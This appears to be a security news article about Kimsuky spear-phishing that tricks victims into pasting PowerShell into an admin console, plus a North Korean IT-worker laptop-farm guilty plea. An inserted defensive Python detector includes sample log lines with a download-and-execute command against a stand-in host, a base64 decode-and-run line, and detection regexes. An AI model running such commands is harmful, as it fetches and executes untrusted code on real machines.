North Korean hackers, specifically the Kimsuky group, are employing a new tactic in their cyber attacks. This involves tricking victims into executing malicious code via a PowerShell exploit. The attack begins with spear-phishing emails, disguised as communications from South Korean government officials. These emails contain a PDF attachment.
“To execute this tactic, the threat actor masquerades as a South Korean government official and over time builds rapport with a target before sending a spear-phishing email with an [sic] PDF attachment,” the Microsoft Threat Intelligence team explained on X.
The PDF directs victims to a URL with instructions for “registering” their Windows system. The instructions tell the victim to launch PowerShell as an administrator, paste the provided code, and run it, which installs malware without the victim realising it.
This method, along with the “ClickFix” technique, is gaining popularity because it bypasses security measures by having the target infect their own machine. This is a clever use of a PowerShell exploit.
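The defensive angle on the paste-and-run chain described above, as an added example that is not code from the article or from Microsoft: PowerShell script block logging (event 4104 in the PowerShell Operational log) records what was pasted, and a detection can flag blocks typed into an elevated interactive console that fetch or decode content and immediately execute it. The sample records, and the assumption that each is already enriched with the host application and elevation state from process-creation telemetry, are constructed for this example.

```python
import re

# Constructed sample records, not real telemetry. Each models the
# ScriptBlockText of a PowerShell event 4104, assumed to be enriched with the
# host application, the launching script path and token elevation.
SAMPLE_EVENTS = [
    {"user": "CORP\\jdoe", "host": "ConsoleHost", "elevated": True, "path": "",
     "script": "iex (New-Object Net.WebClient).DownloadString('http://register.example.invalid/s.ps1')"},
    {"user": "CORP\\ops", "host": "ConsoleHost", "elevated": True, "path": "",
     "script": "Get-Service | Where-Object Status -eq 'Running'"},
    {"user": "CORP\\build", "host": "ConsoleHost", "elevated": False, "path": "C:\\ci\\deploy.ps1",
     "script": "Invoke-WebRequest -Uri https://artifacts.example.invalid/a.zip -OutFile a.zip"},
    {"user": "CORP\\asmith", "host": "ConsoleHost", "elevated": False, "path": "",
     "script": "$b=[Convert]::FromBase64String($p); Invoke-Expression ([Text.Encoding]::Unicode.GetString($b))"},
]

# Content arrives from the network or from an encoded blob ...
FETCH = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|"
    r"\birm\b|Start-BitsTransfer|FromBase64String", re.I)
# ... and is handed straight to an execution primitive.
EXEC = re.compile(r"\biex\b|Invoke-Expression|&\s*\$|Start-Process", re.I)


def classify(event):
    """Return (severity, reasons) for one enriched script block record."""
    reasons = []
    # ClickFix-style activity is typed or pasted into an interactive console;
    # a block launched from a script file on disk is a different signal.
    if event["host"] != "ConsoleHost" or event["path"]:
        return None, reasons
    if FETCH.search(event["script"]):
        reasons.append("fetches remote or decoded content")
    if EXEC.search(event["script"]):
        reasons.append("executes that content")
    if len(reasons) < 2:
        return None, []   # fetch without exec (or vice versa) is too noisy alone
    if event["elevated"]:
        reasons.append("runs in an elevated console")
        return "high", reasons
    return "medium", reasons


def flag_events(events):
    """Return (user, severity, reasons) for every record that matches."""
    hits = []
    for ev in events:
        severity, reasons = classify(ev)
        if severity:
            hits.append((ev["user"], severity, reasons))
    return hits
```

The regexes are deliberately narrow; in production they would be tuned against the organisation's own baseline of legitimate interactive PowerShell use.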
This cyber attack highlights the evolving methods used by North Korean hackers.
In a separate development, a 48-year-old Arizona woman has pleaded guilty to facilitating a scheme that benefited North Korean IT workers. Christina Marie Chapman’s actions allowed North Korean threat actors to secure remote IT jobs at over 300 U.S. companies.
She posed as a U.S. citizen, generating over $17.1 million in illicit revenue between October 2020 and October 2023.
“Chapman, an American citizen, conspired with overseas IT workers from October 2020 to October 2023 to steal the identities of U.S. nationals and used those identities to apply for remote IT jobs and, transmitted false documents to the Department of Homeland Security,” the Department of Justice (DoJ) stated.
Chapman also operated a “laptop farm,” hosting multiple laptops to create the illusion that the North Korean workers were located within the U.S., while actually operating remotely from China and Russia. This allowed them access to the internal systems of numerous companies.
“As a result of the conduct of Chapman and her conspirators, more than 300 U.S. companies were impacted, more than 70 identities of U.S. person were compromised, on more than 100 occasions false information was conveyed to DHS, and more than 70 U.S. individuals had false tax liabilities created in their name,” the DoJ added.
The FBI has also warned of escalating data exfiltration and extortion attempts by these North Korean IT workers once discovered on company networks. They hold stolen data hostage, demanding ransoms, and in some cases, publicly releasing stolen code.
These actions represent a significant threat and a concerning escalation of the cyber attack landscape. The use of a PowerShell exploit in this attack is particularly concerning.